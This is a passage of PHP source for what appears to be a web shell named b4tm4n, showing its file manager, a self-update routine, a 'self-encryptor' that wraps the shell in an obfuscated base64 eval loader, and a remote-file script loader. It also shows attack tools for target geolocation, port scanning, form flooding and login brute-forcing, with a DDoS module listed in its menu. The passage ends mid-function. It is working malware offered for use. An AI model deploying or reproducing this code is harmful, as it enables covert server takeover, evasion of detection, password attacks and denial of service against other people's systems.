< table class = 'table' >% s </ table >
< form class = 'new' method = 'post' action = '?x=action&xa=option' >
< script > window . onload = function ( e ){ document . getElementById ( 'action_option' ) . value = '%s' } </ script >
< select name = 'action-option' id = 'action_option' >
< option value = 'copy' > Copy </ option >
< option value = 'move' > Move </ option >
< option value = 'zip' > Archive ( zip ) </ option >
< option value = 'unzip' > Extract to ( zip ) </ option >
</ select >
< i >-></ i >
< input type = 'hidden' name = 'tmp' value = '%s' />
< input type = 'text' name = 'newloc' value = '%s' />
< input type = 'submit' value = 'Process' />
</ form > " ,
$count_dirs ,
$count_files ,
$row ,
$value ,
$tmp ,
$dir . _ );
if ( any ( 'xa' , $_REQUEST ) && $_REQUEST [ 'xa' ] == 'option' )
$files = array_filter ( explode ( ',' , $_REQUEST [ 'tmp' ]));
$newloc = trim ( @ $_REQUEST [ 'newloc' ]);
$succ = 0 ;
$fail = 0 ;
if ( $_REQUEST [ 'action-option' ] == 'copy' )
if ( file_exists ( $newloc ) && is_dir ( $newloc ))
foreach ( $files as $file )
if ( CopyRecursive ( $file , rtrim ( $newloc , _ ) . _ . basename ( $file )))
$succ ++ ;
$fail ++ ;
print " Success: $succ | Failed: $fail " ;
print " Target not exists ! " ;
if ( $_REQUEST [ 'action-option' ] == 'move' )
if ( file_exists ( $newloc ) && is_dir ( $newloc ))
foreach ( $files as $file )
if ( MoveRecursive ( $file , rtrim ( $newloc , _ ) . _ . basename ( $file )))
$succ ++ ;
$fail ++ ;
print " Success: $succ | Failed: $fail " ;
print " Target not exists ! " ;
if ( $_REQUEST [ 'action-option' ] == 'delete' )
foreach ( $files as $file )
if ( Remove ( $file ))
$succ ++ ;
$fail ++ ;
print " Success: $succ | Failed: $fail " ;
if ( $_REQUEST [ 'action-option' ] == 'zip' )
if ( pathinfo ( $newloc )[ 'extension' ] == 'zip' )
$zip = new ZipArchive ;
if ( $zip -> open ( $newloc , ZipArchive :: CREATE | ZipArchive :: OVERWRITE ) === TRUE )
foreach ( $files as $file )
if ( is_dir ( $file ))
$zip -> addEmptyDir ( basename ( $file ));
$recur = new RecursiveIteratorIterator (
new RecursiveDirectoryIterator ( $file ),
RecursiveIteratorIterator :: LEAVES_ONLY
foreach ( $recur as $key => $val )
if ( basename ( $key ) != " .. " )
if ( is_dir ( $key ))
$zdir = str_replace ( $file , basename ( $file ), realpath ( $key ));
$zip -> addEmptyDir ( $zdir );
elseif ( is_file ( $key ))
$zfile = str_replace ( $file , basename ( $file ), realpath ( $key ));
$zip -> addFile ( realpath ( $key ), $zfile );
elseif ( is_file ( $file ))
$zip -> addFile ( $file , basename ( $file ));
$zip -> close ();
print 'Zip Created' ;
print 'Failed' ;
print 'Extension must Zip' ;
if ( $_REQUEST [ 'action-option' ] == 'unzip' )
if ( file_exists ( $newloc ) && is_dir ( $newloc ))
foreach ( $files as $file )
if ( pathinfo ( $newloc )[ 'extension' ] == 'zip' )
$zip = new ZipArchive ;
if ( $zip -> open ( $file ) === TRUE )
$zip -> extractTo ( $newloc );
$zip -> close ();
$succ ++ ;
$fail ++ ;
$fail ++ ;
print " Success: $succ | Failed: $fail " ;
print " Target not exists ! " ;
if ( $_REQUEST [ 'x' ] == " find " )
$recur = new RecursiveIteratorIterator (
new RecursiveDirectoryIterator ( $dir ),
RecursiveIteratorIterator :: LEAVES_ONLY
if ( any ( 'find-value' , $_REQUEST ) &&! empty ( $_REQUEST [ 'find-value' ]))
$result = " " ;
$res_ = 0 ;
foreach ( $recur as $key => $val )
if ( basename ( $key ) != " .. " )
if ( strpos ( realpath ( $key ), $_REQUEST [ 'find-value' ]) !== false )
$result .= sprintf ( " <tr>
< td ></ td >
< td >< a href = '?g=%s' title = '%s' target = '_blank' >% s </ a ></ td >
< td >< a href = '?g=%s' title = '%s' target = '_blank' >% s </ a ></ td >
< td >< center >% s </ center ></ td >
</ tr > " ,
substr ( realpath ( $key ), 0 , strrpos ( realpath ( $key ), _ )),
substr ( realpath ( $key ), 0 , strrpos ( realpath ( $key ), _ )),
substr ( realpath ( $key ), 0 , strrpos ( realpath ( $key ), _ )),
realpath ( $key ),
realpath ( $key ),
basename ( realpath ( $key )),
GetFileTime ( realpath ( $key ), 'modify' )
$res_ ++ ;
printf ( "
< form class = 'new' method = POST action = '?x=find' >
< input type = 'text' name = 'find-value' id = 'find-action' value = '%s' />< input type = 'submit' name = 'find-button' value = 'Find' />
< label style = 'margin-left:10px' >< font class = 'on' > Find : '%s' | Found ' s : % s </ font ></ label >
</ form >
< div class = 'auto-number' >
< table class = 'table sortable' >
< thead >
< tr >
< th class = 'sorttable_nosort' width = '15' > No .</ th >
< th > Directory </ th >
< th > Name </ th >
< th > Modified </ th >
</ tr >
< tbody >% s </ tbody >
</ table >
</ div > " , $_REQUEST['find-value'] , $_REQUEST['find-value'] , $res_ , $result );
print " <form class='new' method=POST action='?x=find'>
< input type = 'text' name = 'find-value' />< input type = 'submit' name = 'find-button' value = 'Find' />
< label style = 'margin-left:10px' >< font color = 'red' > Whoops , Nothing to Found ' s !</ font ></ label >
</ form > " ;
if ( $_REQUEST [ 'x' ] == " update " )
$link_update = 'https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php' ;
$current_version = 2.7 ; //New Version Released
if ( $config [ 'debug' ] == true )
$latest_version = $current_version + 0.1 ; //Test Update latest version -/+ 0.1
$git_script = GetUrlContent ( $link_update );
$get_version = strpos ( $git_script , " current_version " );
$version = substr ( $git_script , $get_version + 16 , 3 );
$latest_version = is_numeric ( $version ) ? $version : $current_version ;
$status = " " ;
if (( float ) $latest_version > ( float ) $current_version )
if ( $config [ 'debug' ] == true )
$status .= 'New Version Available ' . $latest_version . '<br>Setting Debug to False for Activate this Feature' ;
$status .= 'New Version Available ' . $latest_version . '<br>Download -> [<font class="on"><a href="' . $link_update . '" target="_blank">link</a></font>]' ;
$status .= 'Latest Version ' . $current_version ;
Printf ( " <div id='update'>
< a href = 'https://www.gnu.org/licenses/gpl-3.0.txt' target = '_blank' title = 'License' >
< img src = 'https://www.gnu.org/graphics/lgplv3-88x31.png' />
</ a >< br >< br >% s
</ div > " , $status );
if ( $_REQUEST [ 'x' ] == " self-encryptor " )
if ( $php_script = htmlentities ( @ file_get_contents ( __FILE__ )))
$asu = strpos ( $php_script , $_SESSION [ " action " ][ " password " ]);
$temp = substr ( $php_script , $asu + 48 );
$rand = " \$ " . substr ( str_shuffle ( " abcdefghijklmnopqrstuvwxyz " ), 0 , rand ( 1 , 3 ));
$rand2 = " \$ " . substr ( str_shuffle ( " abcdefghijklmnopqrstuvwxyz " ), 0 , rand ( 2 , 5 ));
$_a = " b " ; $_b = " a " ; $_c = " s " ; $_d = " e " ; $_e = " 6 " ; $_f = " 4 " ;
$_g = " _ " ; $_h = " e " ; $_i = " n " ; $_j = " c " ; $_k = " o " ; $_l = " d " ; $_m = " e " ;
$b64e = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_h . $_i . $_j . $_k . $_l . $_m ;
$b64d = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_l . $_m . $_j . $_k . $_l . $_m ;
$b64 = array (
'"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"' ,
'strrev("ed"."oce"."d_4"."6es"."ab")' ,
'strrev("e"."doc"."ed_"."46e"."sab")' ,
'"b"."as"."e6"."4_"."d"."ec"."o"."de"' ,
$rand_b64 = array_rand ( $b64 );
$rand3 = $b64 [ $rand_b64 ];
$var1 = $rand . '="' . $_SESSION [ " action " ][ " username " ] . ':' . $_SESSION [ " action " ][ " password " ] . '";' ;
$var2 = $rand2 . '=' . $rand3 . ';' ;
$var = array (
$var1 . $var2 ,
$var2 . $var1
$rand_var = array_rand ( $var );
$rand4 = $var [ $rand_var ];
$self = preg_replace ( " / \\ \$ x_/ " , $rand , $temp ); // Change Variable $x_ to Random
$src_ = '' ;
$src_ .= '<?php ' ;
$src_ .= $rand4 ;
$src_ .= '@eval(' . $rand2 . '("' ;
$src_ .= $b64e ( htmlspecialchars_decode ( $self ));
$src_ .= '"))' ;
$src_ .= '?>' ;
$name =! empty ( $_REQUEST [ 'name' ]) ? $_REQUEST [ 'name' ] : 'bat_encrypt.php' ;
$file = dirname ( __FILE__ ) . _ . $name ;
$op = fopen ( $file , 'w+' );
fwrite ( $op , $src_ );
fclose ( $op );
printf ( " <center class='on'>SELF ENCRYPT CREATED !!!</center>
< center class = 'on' >
Link -> < a href = '%s' target = '_blank' >< u >% s </ u ></ a >
</ center > " ,GetUrlFromPath( $file ), $name );
print " <center class='off'>SELF ENCRYPT ENABLE !!!</center> " ;
if ( any ( " z " , $_REQUEST ))
$z = $_REQUEST [ 'z' ];
print MenuTools ( array (
" target-map " => array ( " title " => " Target Map " , " ver " => " 2.0 " , " auth " => " k4mpr3t " ),
" port-scanner " => array ( " title " => " Scan Port " , " ver " => " 1.0 " , " auth " => " k4mpr3t " ),
" script-loader " => array ( " title " => " Script Loader " , " ver " => " 1.0 " , " auth " => " k4mpr3t " ),
" encryptor " => array ( " title " => " Encryptor " , " ver " => " 1.1 " , " auth " => " k4mpr3t " ),
" form-bruteforces " => array ( " title " => " Form Bruteforces " , " ver " => " 1.0 " , " auth " => " k4mpr3t " ),
" login-bruteforces " => array ( " title " => " Login Bruteforces " , " ver " => " 1.0 " , " auth " => " k4mpr3t " ),
" mass-tools " => array ( " title " => " Mass Tools " , " ver " => " 1.0 " , " auth " => " k4mpr3t " ),
" ddos-attack " => array ( " title " => " DDOS Attack " , " ver " => " 2.0 " , " auth " => " k4mpr3t " ),
print " <div id='tools'> " ;
if ( empty ( $z ))
printf ( " <div id='thanks'>
< h2 > Nothing Is Secure ...</ h2 >
< h3 > WHY SO serious ? !</ h3 >
</ div > " );
if ( $z == " target-map " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
printf ( " <div id='target-map'>
< form onsubmit = 'return false;' class = 'new' >
< input type = 'text' id = 'map-ip' value = '%s' />
< input type = 'submit' value = 'Trace' onclick = \ " return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value); \" /><br>
</ form >
</ div >
< div id = 'target-info' class = 'result' ></ div > " ,gethostbyname(http_host));
if ( any ( " ip " , $_REQUEST ))
ob_clean ();
$ip =! empty ( $_REQUEST [ 'ip' ]) ? $_REQUEST [ 'ip' ] : gethostbyname ( http_host );
$valid = filter_var ( $ip , FILTER_VALIDATE_IP ) or die ( 'Invalid IP Address' );
if ( $_REQUEST [ 'ip' ] == gethostbyname ( http_host ))
$url = B64D ( " zSI9xWleO7odODUdzH4qy79ezmMeyr1= " );
$geoip = GetUrlContent ( $url );
$json = json_decode ( $geoip , true );
$url = sprintf ( B64D ( " zSI9xWleO7odODUdzH4qy79ezmMeyr1= " ) . " %s " , $ip );
$geoip = GetUrlContent ( $url );
$json = json_decode ( $geoip , true );
$url = sprintf ( B64D ( " zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa " ) . " ?q=%s,%s&z=10&output=embed " , $json [ 'lat' ], $json [ 'lon' ]);
printf ( " <div class='divide'>
< div class = 'divide-left' >
< table class = 'table' >
< tr >< td > AS </ td >< td >% s </ td ></ tr >
< tr >< td > City </ td >< td >% s </ td ></ tr >
< tr >< td > Country </ td >< td >% s </ td ></ tr >
< tr >< td > Country Code </ td >< td >% s </ td ></ tr >
< tr >< td > ISP </ td >< td >% s </ td ></ tr >
< tr >< td > Latitude </ td >< td >% s </ td ></ tr >
< tr >< td > Logitude </ td >< td >% s </ td ></ tr >
</ table >
</ div >
< div class = 'divide-left' >
< table class = 'table' >
< tr >< td > Origin </ td >< td >% s </ td ></ tr >
< tr >< td > IP </ td >< td >% s </ td ></ tr >
< tr >< td > Region </ td >< td >% s </ td ></ tr >
< tr >< td > Region Name </ td >< td >% s </ td ></ tr >
< tr >< td > Timezone </ td >< td >% s </ td ></ tr >
< tr >< td > Zip </ td >< td >% s </ td ></ tr >
< tr >< td > Status </ td >< td >% s </ td ></ tr >
</ table >
</ div >
</ div >
< iframe src = '%s' width = '100%%' height = '345' frameBorder = '0' >< iframe > " ,
$json [ 'as' ],
$json [ 'city' ],
$json [ 'country' ],
$json [ 'countryCode' ],
$json [ 'isp' ],
$json [ 'lat' ],
$json [ 'lon' ],
$json [ 'org' ],
$json [ 'query' ],
$json [ 'region' ],
$json [ 'regionName' ],
$json [ 'timezone' ],
$json [ 'zip' ],
$json [ 'status' ],
$url );
exit ;
if ( $z == " port-scanner " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
printf ( " <div id='port-scan'>
< form onsubmit = 'return false;' class = 'new' >
< label > Host Port </ label >< input type = 'text' id = 'ip-port' value = '%s' />< br >
< label > Start Port </ label >< input type = 'text' id = 'start-port' value = '1' />< br >
< label > End Port </ label >< input type = 'text' id = 'end-port' value = '65535' />< br >
< label > Methode </ label >< select id = 'scan-port' >< option value = '1' > socket_connect </ option >< option value = '2' > fsockopen </ option ></ select >< br >
< input type = 'submit' onclick = \ " return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value); \" value=Scan />
< input type = 'submit' onclick = \ " return ajaxAbort(true,'port-result') \" value=Cancel />
</ form >
</ div >
< div id = 'port-result' class = 'result' ></ div > " ,gethostbyname(http_host));
if ( any ( " x " , $_REQUEST ) && $_REQUEST [ 'x' ] == " scan-port " )
ob_clean ();
$host = $_REQUEST [ 'ip' ];
$from = $_REQUEST [ 'sp' ];
$to = $_REQUEST [ 'ep' ];
$mtd = $_REQUEST [ 'mtd' ];
switch ( $mtd )
case '1' :
if ( function_exists ( 'socket_create' ))
$socket =@ socket_create ( AF_INET , SOCK_STREAM , SOL_TCP );
for ( $conn_port = $from ; $conn_port <= $to ; $conn_port ++ )
$conn =@ socket_connect ( $socket , $host , $conn_port );
if ( $conn )
print " <br>port $conn_port open " ;
socket_close ( $socket );
$socket =@ socket_create ( AF_INET , SOCK_STREAM , SOL_TCP );
print " Error socket_connect<br> " ;
break ;
case '2' :
for ( $conn_port = $from ; $conn_port <= $to ; $conn_port ++ )
$conn =@ fsockopen ( $host , $conn_port );
if ( $conn )
print " <br>port $conn_port open " ;
fclose ( $conn );
break ;
print " <br>Scan Finish. " ;
exit ;
if ( $z == " script-loader " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
$path = dirname ( __FILE__ ) . _ . 'script-loader' ;
if ( ! is_dir ( $path )) mkdir ( $path , 0755 );
$recur = new RecursiveIteratorIterator (
new RecursiveDirectoryIterator ( $path ),
RecursiveIteratorIterator :: LEAVES_ONLY
$result = " " ;
foreach ( $recur as $key => $val )
if ( basename ( $key ) != " .. " && basename ( $key ) != " . " )
$result .= sprintf ( " <tr>
< td ></ td >
< td >< a href = '%s' target = '_blank' >% s </ a ></ td >
< td >< center >% s </ center ></ td >
</ tr > " ,
GetUrlFromPath ( realpath ( $key )),
basename ( realpath ( $key )),
GetFileTime ( realpath ( $key ), 'modify' )
printf ( " <div id='script-loader'>
< div class = 'divide' >
< div class = 'divide-left' >
< form onsubmit = 'return false;' class = 'new' >
< label > Url </ label >< input type = 'text' id = 'url-source' value = '' />< br >
< label > Filename </ label >< input type = 'text' id = 'file-name' value = '' />< br >
< input type = 'submit' onclick = \ " return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value); \" /><br>
< div id = 'download-result' class = 'result' ></ div >
</ form >
</ div >
< div class = 'divide-right' >
< fieldset >
< legend > List ' s </ legend >
< div class = 'auto-number' >
< table class = 'table' >
< thead >< tr >< th > No .</ th >< th > Name </ th >< th > Modified </ th >
< tbody >% s </ tbody >
</ table >
</ div >
</ fieldset >
</ div >
</ div >
</ div > " , $result );
if ( any ( " url " , $_REQUEST ) && any ( " filename " , $_REQUEST ))
ob_clean ();
$url = $_REQUEST [ 'url' ];
$filename = $_REQUEST [ 'filename' ];
$dest = rtrim ( $path , _ ) . _ . $filename ;
if ( GetUrlExists ( $url ) &&! empty ( $filename ))
if ( GetDownloadUrl ( $url , $dest ))
$url = GetUrlFromPath ( $dest );
printf ( " Success -> <a href=' $url ' target='_blank'><u>Link</u></a> " );
print " <br>Failed " ;
print " <br>Finish " ;
print " <br>Mistakes " ;
exit ;
if ( $z == " encryptor " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
printf ( " <div id='script-loader'>
< form onsubmit = 'return false;' class = 'new' >
< div class = 'hash-control' >
< div class = 'hash' >
< input type = 'radio' name = 'encr' value = 'basic' checked >< label > Basic </ label >
< select id = 'basic-hash' >
< option value = 'md5' > Md5 </ option >
< option value = 'asc' > Char </ option >
< option value = 'chr' > Ascii </ option >
< option value = 'sha1' > Sha1 </ option >
< option value = 'crc32' > Crc32 </ option >
< option value = 'B64E' > B64E </ option >
< option value = 'B64D' > B64D </ option >
< option value = 'urlencode' > URL Encode </ option >
< option value = 'urldecode' > URL Decode </ option >
< option value = 'strlen' > String Length </ option >
< option value = 'strrev' > String Reverse </ option >
< option value = 'base64_encode' > Base64 Encode </ option >
< option value = 'base64_decode' > Base64 Decode </ option >
< option value = 'entties' > Htmlentities </ option >
< option value = 'spechar' > Htmlspecialchars </ option >
</ select >
</ div >
< div class = 'hash' >
< input type = 'radio' name = 'encr' value = 'extra' >< label > Extra </ label >
< select id = 'extra-hash' >
< option value = 'asc-hex' > Ascii => Hex </ option >
< option value = 'asc-bin' > Ascii => Binary </ option >
< option value = 'hex-asc' > Hex => Ascii </ option >
< option value = 'hex-bin' > Hex => Binary </ option >
< option value = 'bin-asc' > Binary => Ascii </ option >
< option value = 'bin-hex' > Binary => Hex </ option >
</ select >
</ div >
< div class = 'hash' >
< input type = 'radio' name = 'encr' value = 'crypt' >< label > Crypt </ label >
< input type = 'text' id = 'crypt-salt' name = 'salt' placeholder = '\$alt' />
</ div >
< div class = 'hash' >
< input type = 'radio' name = 'encr' value = 'hash' >< label > Hash </ label >
< select id = 'hash-hash' >< option value = 'md2' > md2 </ option >< option value = 'md4' > md4 </ option >< option value = 'md5' > md5 </ option >< option value = 'sha1' > sha1 </ option >< option value = 'sha256' > sha256 </ option >< option value = 'sha384' > sha384 </ option >< option value = 'sha512' > sha512 </ option >< option value = 'ripemd128' > ripemd128 </ option >< option value = 'ripemd160' > ripemd160 </ option >< option value = 'ripemd256' > ripemd256 </ option >< option value = 'ripemd320' > ripemd320 </ option >< option value = 'whirlpool' > whirlpool </ option >< option value = 'tiger128,3' > tiger128 , 3 </ option >< option value = 'tiger160,3' > tiger160 , 3 </ option >< option value = 'tiger192,3' > tiger192 , 3 </ option >< option value = 'tiger128,4' > tiger128 , 4 </ option >< option value = 'tiger160,4' > tiger160 , 4 </ option >< option value = 'tiger192,4' > tiger192 , 4 </ option >< option value = 'snefru' > snefru </ option >< option value = 'gost' > gost </ option >< option value = 'adler32' > adler32 </ option >< option value = 'crc32' > crc32 </ option >< option value = 'crc32b' > crc32b </ option >< option value = 'haval128,3' > haval128 , 3 </ option >< option value = 'haval160,3' > haval160 , 3 </ option >< option value = 'haval192,3' > haval192 , 3 </ option >< option value = 'haval224,3' > haval224 , 3 </ option >< option value = 'haval256,3' > haval256 , 3 </ option >< option value = 'haval128,4' > haval128 , 4 </ option >< option value = 'haval160,4' > haval160 , 4 </ option >< option value = 'haval192,4' > haval192 , 4 </ option >< option value = 'haval224,4' > haval224 , 4 </ option >< option value = 'haval256,4' > haval256 , 4 </ option >< option value = 'haval128,5' > haval128 , 5 </ option >< option value = 'haval160,5' > haval160 , 5 </ option >< option value = 'haval192,5' > haval192 , 5 </ option >< option value = 'haval224,5' > haval224 , 5 </ option >< option value = 'haval256,5' > haval256 , 5 </ option ></ select >
< input type = 'checkbox' id = 'hash-raw' /> Raw
</ div >
< div class = 'hash' >
< input type = 'submit' onclick = \ "
url = '' ;
textencode = window . btoa ( document . getElementById ( 'hashtext' ) . value );
radios = document . getElementsByName ( 'encr' );
for ( var i = 0 , length = radios . length ; i < length ; i ++ ){
if ( radios [ i ] . checked ){
switch ( radios [ i ] . value ){
case 'basic' :
url = '?z=encryptor&opt=basic&hash=' + document . getElementById ( 'basic-hash' ) . value + '&text-encode=' + textencode ;
break ;
case 'extra' :
url = '?z=encryptor&opt=extra&hash=' + document . getElementById ( 'extra-hash' ) . value + '&text-encode=' + textencode ;
break ;
case 'crypt' :
url = '?z=encryptor&opt=crypt&salt=' + document . getElementById ( 'crypt-salt' ) . value + '&text-encode=' + textencode ;
break ;
case 'hash' :
url = '?z=encryptor&opt=hash&hash=' + document . getElementById ( 'hash-hash' ) . value + '&raw=' + document . getElementById ( 'hash-raw' ) . checked + '&text-encode=' + textencode ;
break ;
break ;
return getAjax ( false , 'hashresult' , 'POST' , url );
\ " />
< input type = 'submit' onclick = \ "
tempi = document . getElementById ( 'hashresult' ) . value ;
tempi1 = document . getElementById ( 'hashtext' ) . value ;
document . getElementById ( 'hashtext' ) . value = tempi . trim ();
document . getElementById ( 'hashresult' ) . value = tempi1 . trim ();
\ " value='Swap'/>
</ div >
</ div >
< div class = 'hash-capture' >
< div class = 'hash-capture-left' >
< label > String </ label >< textarea id = 'hashtext' ></ textarea >
< input type = 'submit' onclick = \ "
document . getElementById ( 'hashtext' ) . value = '' ;
\ " value='Clear'/>
</ div >
< div class = 'hash-capture-right' >
< label > Result </ label >< textarea id = 'hashresult' ></ textarea >
< input type = 'submit' onclick = \ "
document . getElementById ( 'hashresult' ) . value = '' ;
\ " value='Clear'/>
</ div >
</ div >
</ form >
</ div > " );
function chr_asc ( $str ){
$asc = '' ;
for ( $i = 0 ; $i < strlen ( $str ); $i ++ )
$asc .= ord ( $str { $i }) . ' ' ;
return rtrim ( $asc );
function asc_chr ( $asc ){
$str = '' ;
if ( strpos ( $asc , ' ' )){
$exps = explode ( ' ' , $asc );
foreach ( $exps as $exp )
$str .= chr ( $exp );
} else {
$str = chr ( $asc );
return $str ;
function asc_hex ( $asc ){
$hex = '' ;
for ( $i = 0 ; $i < strlen ( $asc ); $i ++ )
$hex .= sprintf ( " %02x " , ord ( substr ( $asc , $i , 1 )));
return $hex ;
function hex_asc ( $hex ){
$asc = '' ;
for ( $i = 0 ; $i < strlen ( $hex ); $i += 2 )
$asc .= chr ( hexdec ( substr ( $hex , $i , 2 )));
return $asc ;
function hex_bin ( $hex ){
$bin = '' ;
for ( $i = 0 ; $i < strlen ( $hex ); $i ++ )
$bin .= str_pad ( decbin ( hexdec ( $hex { $i })), 4 , '0' , STR_PAD_LEFT );
return $bin ;
function bin_hex ( $bin ){
$hex = '' ;
for ( $i = strlen ( $bin ) - 4 ; $i >= 0 ; $i -= 4 )
$hex .= dechex ( bindec ( substr ( $bin , $i , 4 )));
return strrev ( $hex );
function asc_bin ( $asc ){
$hex = asc_hex ( $asc );
return hex_bin ( $hex );
function bin_asc ( $bin ){
$hex = bin_hex ( $bin );
return hex_asc ( $hex );
if ( any ( " opt " , $_REQUEST ))
ob_clean ();
$opt = $_REQUEST [ 'opt' ];
$_a = " b " ; $_b = " a " ; $_c = " s " ; $_d = " e " ; $_e = " 6 " ; $_f = " 4 " ;
$_g = " _ " ; $_h = " e " ; $_i = " n " ; $_j = " c " ; $_k = " o " ; $_l = " d " ; $_m = " e " ;
$b64e = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_h . $_i . $_j . $_k . $_l . $_m ;
$b64d = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_l . $_m . $_j . $_k . $_l . $_m ;
$text = $b64d ( $_POST [ 'text-encode' ]);
if ( $opt == 'basic' )
$hash = $_REQUEST [ 'hash' ];
switch ( $hash )
case " md5 " : print md5 ( $text ); break ;
case " sha1 " : print sha1 ( $text ); break ;
case " chr " : print asc_chr ( $text ); break ;
case " asc " : print chr_asc ( $text ); break ;
case " crc32 " : print crc32 ( $text ); break ;
case " strlen " : print strlen ( $text ); break ;
case " strrev " : print strrev ( $text ); break ;
case " urlencode " : print urlencode ( $text ); break ;
case " urldecode " : print urldecode ( $text ); break ;
case " entties " : print htmlentities ( $text ); break ;
case " spechar " : print htmlspecialchars ( $text ); break ;
case " base64_encode " : print $b64e ( $text ); break ;
case " base64_decode " : print $b64d ( $text ); break ;
case " B64E " : print B64E ( $text ); break ;
case " B64D " : print B64D ( $text ); break ;
elseif ( $opt == 'extra' )
$hash = $_REQUEST [ 'hash' ];
switch ( $hash )
case " chr-asc " : print str_asc ( $text ); break ;
case " asc-chr " : print asc_str ( $text ); break ;
case " asc-hex " : print asc_hex ( $text ); break ;
case " hex-asc " : print hex_asc ( $text ); break ;
case " hex-bin " : print hex_bin ( $text ); break ;
case " bin-hex " : print bin_hex ( $text ); break ;
case " asc-bin " : print asc_bin ( $text ); break ;
case " bin-asc " : print bin_asc ( $text ); break ;
elseif ( $opt == 'crypt' )
$salt = $_REQUEST [ 'salt' ];
print crypt ( $text , $salt );
elseif ( $opt == 'hash' )
$hash = $_REQUEST [ 'hash' ];
$raw = $_REQUEST [ 'raw' ];
if ( $raw == true )
print hash ( $hash , $text , true );
print hash ( $hash , $text );
exit ;
if ( $z == " form-bruteforces " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
$exp = array (
'{' ,
'"name":"Handsome",' ,
'"email":"very@handsome.com",' ,
'"subject":"WHOOPS YOU GOT E-MAIL ?!",' ,
'"message":"HA HA HA HA HA HA HA HA",' ,
'}' );
printf ( " <div class='divide'>
< div class = 'divide-left' >
< form onsubmit = 'return false;' class = 'new' >
< label > Url Action </ label >< input type = 'text' id = 'form-url' placeholder = 'http://' />< br >
< label > Count 's</label><input type=' number ' id=' form - count ' value=' 100 ' min=' 10 ' autocomplete=' off ' />< br >
< label > Parameter ( JSON ) </ label >
< textarea id = 'form-parameter' >% s </ textarea >
< input type = 'submit' onclick = \ " return ajaxAbort(true,'form-result') \" value=Cancel />
< input type = 'submit' value = 'Attack' onclick = \ " return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value); \" /><br>
</ form >
</ div >
< div class = 'divide-right' >
< fieldset >
< legend > Result ' s </ legend >
< div id = 'form-result' class = 'result' ></ div >
</ fieldset >
</ div >
</ div > " ,implode( $exp , " \n " ));
if ( any ( " url " , $_REQUEST ) && any ( " parameter " , $_REQUEST ))
ob_clean ();
$start = $succ = $fail = 0 ;
$url = $_REQUEST [ 'url' ];
$count = $_REQUEST [ 'count' ];
$parameter = $_REQUEST [ 'parameter' ];
$content = json_decode ( $parameter , true );
if ( ! is_array ( $content )) $content = array ();
do { $start ++ ;
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_USERAGENT , $agent );
curl_setopt ( $ch , CURLOPT_URL , $url );
curl_setopt ( $ch , CURLOPT_POST , 1 );
curl_setopt ( $ch , CURLOPT_CONNECTTIMEOUT , 10 );
curl_setopt ( $ch , CURLOPT_POSTFIELDS , http_build_query ( $content ));
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $ch , CURLOPT_FOLLOWLOCATION , 1 );
$result = curl_exec ( $ch );
$httpcode = curl_getinfo ( $ch , CURLINFO_HTTP_CODE );
if ( curl_error ( $ch )) echo curl_error ( $ch );
curl_close ( $ch );
if ( $httpcode == 200 )
$succ ++ ;
$fail ++ ;
if ( $start == $count )
echo " Success: $succ <br>Failed: $fail <br>Messages: " . htmlspecialchars ( $result );
} while ( $start <= $count );
exit ;
if ( $z == " login-bruteforces " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
printf ( " <div id='login-bruteforces'>
< div class = 'divide-left' >
< form onsubmit = 'return false;' class = 'new' >
< label > Url Action </ label >< input type = 'text' id = 'login-url' placeholder = 'http://' />< br >
< label > User List </ label >< input type = 'text' id = 'login-user' placeholder = 'admin' value = 'admin' />< br >
< label >& nbsp ; </ label >< input type = 'text' id = 'login-username' placeholder = 'User Fieldname' />< br >
< label > Pass List </ label >< input type = 'text' id = 'login-passlist' placeholder = 'http://' />< br >
< label >& nbsp ; </ label >< input type = 'text' id = 'login-passname' placeholder = 'Pass Fieldname' />< br >
< input type = 'submit' onclick = \ " return getAjax(true,'login-result','POST',
'?z=login-bruteforces' +
'&url=' + document . getElementById ( 'login-url' ) . value +
'&user=' + document . getElementById ( 'login-user' ) . value +
'&userfield=' + document . getElementById ( 'login-username' ) . value +
'&passfield=' + document . getElementById ( 'login-passname' ) . value +
'&passlist=' + document . getElementById ( 'login-passlist' ) . value ); \ " /><br>
</ form >
</ div >
< div class = 'divide-right' >
< fieldset >
< legend > Result ' s </ legend >
< div id = 'login-result' class = 'result' ></ div >
</ fieldset >
</ div >
</ div > " );
if ( any ( " url " , $_REQUEST ) && any ( " user " , $_REQUEST ))
